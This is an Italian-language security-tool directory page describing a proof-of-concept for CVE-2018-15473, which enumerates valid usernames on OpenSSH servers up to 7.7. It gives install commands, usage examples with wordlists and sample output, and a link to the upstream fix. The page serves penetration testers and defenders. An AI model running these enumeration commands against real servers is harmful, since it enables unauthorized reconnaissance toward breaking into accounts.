Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-15473 — Strumento di enumerazione di nomi utente SSH che sfrutta la CVE-2018-15473 per identificare utenti validi su server OpenSSH tramite bypass di autenticazione basato su tempistiche. | Kitploit
Strumenti/GitHubGitHub/1stpeak/cve-2018-15473
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration Testing
GitHub1stpeak/cve-2018-15473

CVE-2018-15473

Strumento di enumerazione di nomi utente SSH che sfrutta la CVE-2018-15473 per identificare utenti validi su server OpenSSH tramite bypass di autenticazione basato su tempistiche.

Vedi Repository
5 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-15473

Causa

Il server OpenSSH non ritarda il trattamento di un utente non valido prima di analizzare completamente un pacchetto contenente una richiesta. La vulnerabilità è correlata a auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c.

Sfruttamento

Sebbene la vulnerabilità non possa essere utilizzata per generare un elenco di nomi utente validi, può comunque essere sfruttata per enumerare e indovinare i nomi utente.

Versioni affette

OpenSSH <= 7.7

Versioni non affette

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

Installazione del PoC

Potrebbe essere necessario installare il pacchetto equivalente a openssl-dev per la propria distribuzione.

root@kitploit:~
# Nota: se si installa su Kali, è possibile saltare l'installazione pip ed eseguire solo i primi tre passaggi perché paramiko è già presente.
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt 
# Oppure scaricare e installare con il seguente comando
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Esempi d'uso

Esempio 1: Enumerazione di un singolo utente

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!

Esempio 2: Enumerazione di più utenti con 10 thread (thread predefiniti = 4)

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
ecc.

Esempio 3: Indirizzo IPv6 con porta SSH specificata

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
ecc.

Soluzione

Si consiglia di aggiornare a una versione non affetta. Il progetto OpenBSD ha già rilasciato una correzione del codice sorgente al seguente link: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

Riferimenti

https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/

Scarica lo strumento